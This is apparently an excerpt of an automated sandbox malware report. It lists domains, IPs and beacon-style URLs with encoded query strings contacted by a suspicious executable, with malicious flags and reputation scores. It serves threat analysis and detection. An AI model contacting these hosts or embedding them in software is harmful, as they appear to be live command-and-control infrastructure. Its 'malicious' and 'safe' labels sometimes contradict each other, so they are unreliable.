http://www.loginov.enterprises/y0sc/	0%	Avira URL Cloud	safe
http://www.flikka.site/brrb/	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111441491430.jpg	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css	0%	Avira URL Cloud	safe
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dns.webcake.io	113.20.119.31	true	false		high
ghs.google.com	142.250.184.211	true	false		high
loginov.enterprises	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
wcp95.top	154.23.184.95	true	true	2%, Virustotal, Browse	unknown
iuyi542.xyz	38.47.237.27	true	true	3%, Virustotal, Browse	unknown
neg21.top	206.119.81.36	true	true	3%, Virustotal, Browse	unknown
www.college-help.info	38.88.82.56	true	true		unknown
www.jllllbx.top	156.234.28.94	true	false		high
binacamasala.com	3.33.130.190	true	true		unknown
ladylawher.shop	3.33.130.190	true	true		unknown
www.kghjkx.xyz	47.129.103.185	true	true		unknown
www.yvrkp.top	104.21.14.183	true	true		unknown
www.flikka.site	67.223.117.142	true	true		unknown
www.marketplacer.top	194.58.112.174	true	true		unknown
www.hasthosting.xyz	185.27.134.144	true	true		unknown
energyparks.net	3.33.130.190	true	true		unknown
www.primeproperty.property	unknown	unknown	false		unknown
www.digitaladpro.shop	unknown	unknown	false		unknown
www.energyparks.net	unknown	unknown	false		unknown
www.neg21.top	unknown	unknown	false		unknown
www.loginov.enterprises	unknown	unknown	false		unknown
www.binacamasala.com	unknown	unknown	false		unknown
www.wcp95.top	unknown	unknown	false		unknown
www.iuyi542.xyz	unknown	unknown	true		unknown
www.ladylawher.shop	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.primeproperty.property/c1ti/	true	Avira URL Cloud: safe	unknown
http://www.hasthosting.xyz/04fb/	true	Avira URL Cloud: safe	unknown
http://www.kghjkx.xyz/usop/?Ir8HUj=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.loginov.enterprises/y0sc/?Ir8HUj=tJdq8Dqw4hWr1P6qEs9XA9ulKGeCKOZ69MCgVLcAx6ZVjDjmpjdFTuG7zOk3Xzu/3Z3aFvoU5EatdrO56B9xfE0dTwpHmj+n2Md29oHJdKs4Wl1g5NQAF3s=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.energyparks.net/k47i/	true	Avira URL Cloud: safe	unknown
http://www.primeproperty.property/c1ti/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=	true	Avira URL Cloud: safe	unknown
http://www.flikka.site/brrb/?Ir8HUj=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.neg21.top/1i1f/	true	Avira URL Cloud: safe	unknown
http://www.ladylawher.shop/i4bc/	true	Avira URL Cloud: safe	unknown
http://www.digitaladpro.shop/m6se/?Ir8HUj=tpLSjTwEMN9ZKyp9qReDGLLjNHd3g2FWt49InxX861XvXeuMycl54O2gPUIwqUAFUHZpWTTH+IZzoIJ8zXVpnZ2Md6c4WxN9xCYnLA+vBCEiYAXHGzT4+go=&gRU0e=jXFT04FhvBZ8j0BP	false	Avira URL Cloud: safe	unknown
http://www.energyparks.net/k47i/?Ir8HUj=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.kghjkx.xyz/usop/	true	Avira URL Cloud: safe	unknown
http://www.college-help.info/fu91/?Ir8HUj=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.wcp95.top/1bs4/?Ir8HUj=NHlL/20Wj3mxTDCCV+M5id+XoFfJt54Wk+fSFhy0eU4XSufIixCpuDbgh6jDD4pzJGK3HRNTU3Jm+E3fIwMaFSslRZAP0ZQrwEek3MA5lFQUr9BJzjrl1NA=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.ladylawher.shop/i4bc/?Ir8HUj=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.hasthosting.xyz/04fb/?Ir8HUj=EDSq5eKeQ/yn+NstHP+aoJNwtbWo2f2aV0X8lTwCWtszw4+D6CyS4FGQqOFHTxK4f9NdVPPEgKVRXB/uQSDXYOkNzy5V1DgJAKJcxyf5ssQ9BiSUznEU9hA=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.iuyi542.xyz/cymd/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ=	true	Avira URL Cloud: safe	unknown
http://www.wcp95.top/1bs4/	true	Avira URL Cloud: safe	unknown
http://www.binacamasala.com/usv6/	true	Avira URL Cloud: safe	unknown
http://www.iuyi542.xyz/cymd/	true	Avira URL Cloud: safe	unknown
http://www.digitaladpro.shop/m6se/	false	Avira URL Cloud: safe	unknown
http://www.jllllbx.top/s7rc/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=6DRnIJ+Fte42OB/5XahWefuJxFukpBxOvMg5DpP/yyjJNxXWq01mXWJaUM52jX/tQu57he5PJxxVPcJX3Ib35ixrzLdezhzqPCe9qS9F0Axe4HxDKFQRrXU=	true	Avira URL Cloud: safe	unknown
http://www.college-help.info/fu91/	true	Avira URL Cloud: safe	unknown
http://www.binacamasala.com/usv6/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=	true	Avira URL Cloud: safe	unknown
http://www.yvrkp.top/9jdk/	true	Avira URL Cloud: safe	unknown
http://www.yvrkp.top/9jdk/?Ir8HUj=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&gRU0e=jXFT04FhvBZ8j0BP	true	Avira URL Cloud: safe	unknown
http://www.loginov.enterprises/y0sc/	true	Avira URL Cloud: safe	unknown
http://www.flikka.site/brrb/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/02/202310021539053089.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111418363409.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reg.ru	AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.reg.ru/domain/new/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_lan	AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hasthosting.xyz/04fb/?Ir8HUj=EDSq5eKeQ/yn	AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4110035048.00000000067C2000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000004FE2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111308331250.jpg	DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111414394270.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/15/202310151543577674.gif	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111730363919.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281739019902.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121012371226.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111336168422.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hasthosting.xyz	DvhYoKnukykMD.exe, 00000005.00000002.4110795984.00000000058F7000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111650528174.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.kghjkx.xyz/usop/?Ir8HUj=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJ	AtBroker.exe, 00000003.00000002.4110035048.0000000005E56000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000004676000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/whois/?check=&dname=www.marketplacer.top&reg_source=parking_auto	AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281742124338.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111312107302.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land	AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://00808.vip/	AtBroker.exe, 00000003.00000002.4110035048.0000000005034000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003854000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2067710841.0000000019264000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111457131826.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111352290269.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281551058064.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111316162395.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121107457674.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://getbootstrap.com/)	AtBroker.exe, 00000003.00000002.4110035048.0000000005FE8000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000004808000.00000004.00000001.00040000.00000000.sdmp	false		high
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121017068870.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121445018007.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281533072611.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css	DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=	AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/sozdanie-saita/	AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://github.com/twbs/bootstrap/blob/master/LICENSE)	AtBroker.exe, 00000003.00000002.4110035048.0000000005FE8000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000004808000.00000004.00000001.00040000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_h	AtBroker.exe, 00000003.00000002.4110035048.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/12/202310121040515603.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202309/19/202309191047059862.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	AtBroker.exe, 00000003.00000003.1959912677.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
